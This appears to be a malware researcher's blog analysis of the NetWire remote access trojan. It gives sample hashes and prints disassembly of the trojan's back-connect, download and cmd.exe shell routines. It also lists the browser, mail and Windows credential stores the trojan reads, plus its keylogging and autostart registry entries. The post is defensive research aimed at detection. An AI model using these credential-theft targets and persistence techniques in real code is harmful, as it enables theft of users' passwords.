The background
It has been a talk internally in our group about a RAT (Remote Access Trojans) that is commonly found and used by crooks called "NetWire RAT". The talks is about why this RAT was commonly found during the carding, POS or etc hack cases related to the cyber criminal activities, and is this RAT multi platform supported, etc..
Shortly, I think it will be good if I post it here a thorough reference for my friend and also the fellow researchers + industries to understand about the threat (if not known this yet) and to raise the awareness to the internet users of the existence of this malware (RAT family). This is a generally writing post, and I will add with some details later along with the more thorough check & investigation. Comments are welcome to add your vision to this threat, enjoy!
The samples
Samples can be randomly search in Virus Total with the below hashes:
07470d9b10cefa3a7dcb3a156f067203 9769cf1ab9fc54d1d7da644d94644273 1c1c848bbefe6d8353010619d50ef81f 1931bcb54655ca2018fec60bf84776f7 674d9a19d4e0c72c47738d7ae59c351c 45db57d2c15bf1f9dde1cbe8202323f3 64cf99ed2d02bb22eaad9e9699631424 628cf758e08575c475787e9caa2702eb 1e65e53427319e10ef3ee114caa2c638
The origin
Below is the origin of this threat, it was starting from 2012, with the complete explanation from its malware author. I made a loong picture for it, so please be patient with the download. Here we go:
Installation and howto
A howto for this RAT explained by the author is as per below pictures. Please click them one by one sequentially.
Specific characteristic
Some characteristic in reversing point of view will be explained in this section as a quicky. Feel free to examine deeper. I used the sample with hash 1931bcb54655ca2018fec60bf84776f7 which I thought was the latest that I can find and it is obviously the trial version of this RAT as per seen in uploaded data below:
md5: 1931bcb54655ca2018fec60bf84776f7 directory: userprofile%\desktop\netwire-trial\ filename: doit.exe
Binary analysis in PEStudio
I'm a big fan and ssupporter to Marc's PEStudio, it detected this RAT pretty good, below is the original indicators spotted for helping you in analyzing this RAT:
Reversing & strings
Back connect
Back connect functionality can be seen in the function below using the HTTP/1.0:
; start addr 0x40391C ; callback functions in HTTP/1.0 push ebp mov ebp, esp push edi push esi push ebx sub esp, 22Ch mov esi, [ebp+arg_0] mov eax, [ebp+arg_8] mov [esp+238h+var_228], eax mov eax, [ebp+arg_4] mov [esp+238h+var_22C], eax mov [esp+238h+var_230], offset aConnectSDHttp1 ; "CONNECT %s:%d HTTP/1.0\n\n" mov [esp+238h+var_234], 200h lea ebx, [ebp+var_218] mov [esp+238h+var_238], ebx call 0x4094C7 mov edi, eax mov [esp+238h+var_22C], 0 mov [esp+238h+var_230], eax mov [esp+238h+var_234], ebx mov [esp+238h+var_238], esi call send sub esp, 10h
Download function
It uses HTTP/1.1 for the download functions..
; in proc addr 0x4050F3 ; download functions in HTTP/1.1 mov eax, [ebp+arg_0] lea edx, [eax+204h] mov [esp+868h+var_858], edx mov [esp+868h+var_85C], eax mov [esp+868h+var_860], offset aGetSHttp1_1Hos ; "GET %s HTTP/1.1\r\nHost: %s \r\nConnection:"... mov [esp+868h+var_864], 800h lea ebx, [ebp+var_818] mov [esp+868h+var_868], ebx call 0x4094C7 xor eax, eax or ecx, 0xFFFFFFFFh mov edi, ebx repne scasb not ecx dec ecx mov [esp+868h+var_85C], 0 mov [esp+868h+var_860], ecx mov [esp+868h+var_864], ebx mov eax, [ebp+var_82C] mov [esp+868h+var_868], eax call send sub esp, 10h mov [esp+868h+var_864], offset aWb_0 ; "wb" mov eax, [ebp+arg_0] add eax, 408h mov [esp+868h+var_868], eax call fopen mov edi, eax test eax, eax
Shell
Attempt to gain access to the Windows OS shell (cmd.exe) is spotted after some check to the environment was done, as per below:
; shell was gained in here (cmd.exe) ; after checking environment ; function in addr 0x4056A0 push ebp mov ebp, esp push edi push esi push ebx sub esp, 2CCh mov [esp+2D8h+var_2D8], offset aComspec ; "ComSpec" call getenv mov [esp+2D8h+var_2CC], eax mov [esp+2D8h+var_2D0], offset aS_0 ; "%s" mov [esp+2D8h+var_2D4], 204h lea ebx, [ebp+var_21C] mov [esp+2D8h+var_2D8], ebx call 0x4094C7 mov [esp+2D8h+var_2D8], ebx call 0x4047A1 test al, al jnz short 0x40570E : ; in addr 0x40570E mov [esp+2D8h+var_2D8], offset aWindir ; "WINDIR" call getenv mov [esp+2D8h+var_2CC], eax mov [esp+2D8h+var_2D0], offset aSSystem32Cmd_e ; "%s\\system32\\cmd.exe" mov [esp+2D8h+var_2D4], 204h mov [esp+2D8h+var_2D8], ebx
Credential Grabber
The below string list will be enough to describe what is being aimed by this RAT:
.data:0x40FA03 SOFTWARE\\Mozilla\\%s\\ .data:0x40FA18 CurrentVersion .data:0x40FA27 SOFTWARE\\Mozilla\\%s\\%s\\Main .data:0x40FA43 Install Directory .data:0x40FA55 %s\\%s .data:0x40FA5B mozutils.dll .data:0x40FA68 mozglue.dll .data:0x40FA74 mozsqlite3.dll .data:0x40FA83 Mozilla Firefox .data:0x40FA93 APPDATA .data:0x40FA9C %s\\Mozilla\\Firefox\\profiles.ini .data:0x40FABC %s\\Mozilla\\Firefox\\%s .data:0x40FAD2 Mozilla Thunderbird .data:0x40FAE6 %s\\Thunderbird\\profiles.ini .data:0x40FB02 %s\\Thunderbird\\%s .data:0x40FB14 SeaMonkey .data:0x40FB20 %s\\Mozilla\\SeaMonkey\\profiles.ini .data:0x40FB42 %s\\Mozilla\\SeaMonkey\\%s .data:0x40FB5A %s\\signons.sqlite .data:0x40FB6C NSS_Init .data:0x40FB75 PK11_GetInternalKeySlot .data:0x40FB8D PK11_Authenticate .data:0x40FB9F NSSBase64_DecodeBuffer .data:0x40FBB6 PK11SDR_Decrypt .data:0x40FBC6 PK11_FreeSlot .data:0x40FBD4 NSS_Shutdown .data:0x40FBE1 sqlite3_open .data:0x40FBEE sqlite3_close .data:0x40FBFC sqlite3_prepare_v2 .data:0x40FC0F sqlite3_step .data:0x40FC1C sqlite3_column_text .data:0x40FC30 select *from moz_logins .data:0x40FC4A %c%s\a%s\a%s\b\b\b\b .data:0x40FC59 %s\\Opera\\Opera\\wand.dat .data:0x40FC74 %s\\Opera\\Opera\\profile\\wand.dat .data:0x40FC94 rb .data:0x40FC97 \b\b\b\b .data:0x40FC9C %s\\.purple\\accounts.xml .data:0x40FCB4.data:0x40FCBF %d%s\a .data:0x40FCC5 .data:0x40FCCC .data:0x40FCD7 %s\a .data:0x40FCDB advapi32.dll .data:0x40FCE8 CredEnumerateA .data:0x40FCF7 CredFree .data:0x40FD00 WindowsLive:name=* .data:0x40FD16 %d%s\a%ws\a .data:0x40FD20 Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676 .data:0x40FD9B Email .data:0x40FDA1 POP3 User .data:0x40FDAB POP3 Server .data:0x40FDB7 POP3 Password .data:0x40FDC5 IMAP User .data:0x40FDCF IMAP Server .data:0x40FDDB IMAP Password .data:0x40FDE9 HTTP User .data:0x40FDF3 HTTP Server .data:0x40FDFF HTTP Password .data:0x40FE0D SMTP User .data:0x40FE17 SMTP Server .data:0x40FE23 SMTP Password .data:0x40FE94 Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2 .data:0x40FEDE index.dat .data:0x40FEE8 History .data:0x40FEF0 Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders .data:0x40FF34 %s\\Google\\Chrome\\User Data\\Default\\Login Data .data:0x40FF64 %s\\Chromium\\User Data\\Default\\Login Data .data:0x40FFAC localhost .data:0x40FFB6 USERNAME .data:0x40FFBF Unknown .data:0x40FFC7 kernel32.dll .data:0x40FFD4 GetNativeSystemInfo .data:0x40FFE8 SYSTEM\\CurrentControlSet\\Control\\ProductOptions .data:0x410018 ProductType .data:0x410024 WINNT .data:0x41002A LANMANNT .data:0x410033 SERVERNT .data:0x41003C %d .data:0x41003F GlobalMemoryStatusEx .data:0x410054 WINDIR .data:0x41005B PATH .data:0x410060 %s\a%s\a%s\a%I64u\a%I64u\a%I64u\a%s\a%s\a%s\a%s\a%d\a%s\a%d\a%s\a%d\a%s\a%d\a
Keystroke Mapping from remote operation
This one is also self-explanatory:
.data:0x41020C [Backspace] .data:0x410218 [Enter] .data:0x410220 [Tab] .data:0x410226 [Arrow Left] .data:0x410233 [Arrow Up] .data:0x41023E [Arrow Right] .data:0x41024C [Arrow Down] .data:0x410259 [Home] .data:0x410260 [Page Up] .data:0x41026A [Page Down] .data:0x410276 [End] .data:0x41027C [Break] .data:0x410284 [Delete] .data:0x41028D [Insert] .data:0x410296 [Print Screen] .data:0x4102A5 [Scroll Lock] .data:0x4102B3 [Caps Lock] .data:0x4102BF [Alt] .data:0x4102C5 [Esc] .data:0x4102CB [Ctrl+%c]
Autostart
I almost forget this one..
.data:0x4100A5 SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ .data:0x4100D4 SOFTWARE\\Microsoft\\Active Setup\\Installed Components .data:0x41010F SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\%s .data:0x41014C StubPaththe %s value is like below:
{ND34H04A-G0C3-3VIE-0550-N18U87UEDA40}
Many other function too, please feel free to check it yourself, for practise :)
Signature and Prologue
For getting a bit of idea in mitigation and detecting this sample, I modified a sample filtration signature that can be accessed in -->[here] on a Yara rule format. It is NOT an official Yara rules, and I posted here for an example and research purpose, some trimmed codes was done for the adjustment, and I may modify this for the better detection purpose too.
PS: It's good to be back :-)
Kudos researcher friends w/feedback, thank you!
@MalwareMustDie Thanks for sharing. Have you check the commands? to see if they match previous version analyzed? https://t.co/QhNHOxD7E9
— Alexandre Dulaunoy (@adulau) April 6, 2015
@MalwareMustDie the "New Profile" menu in NetWire Workstation lets you select "GNU/Linux". @rmsthebot would be proud!
— Dan Helton (@ch1kpee) April 6, 2015
@MalwareMustDie Very good finding! "Keystroke Mapping" detection will be added to the next #pestudio pic.twitter.com/u14fu59pwd
— Marc Ochsenmeier (@ochsenmeier) April 6, 2015
NetWire RAT gives HKCU Run key and ActiveX #persistence options. Nice find @MalwareMustDie! https://t.co/GtesYXFAW9 pic.twitter.com/bRzHMPd69w
— Huntress Labs (@HuntressLabs) January 20, 2016
#MalwareMustDie!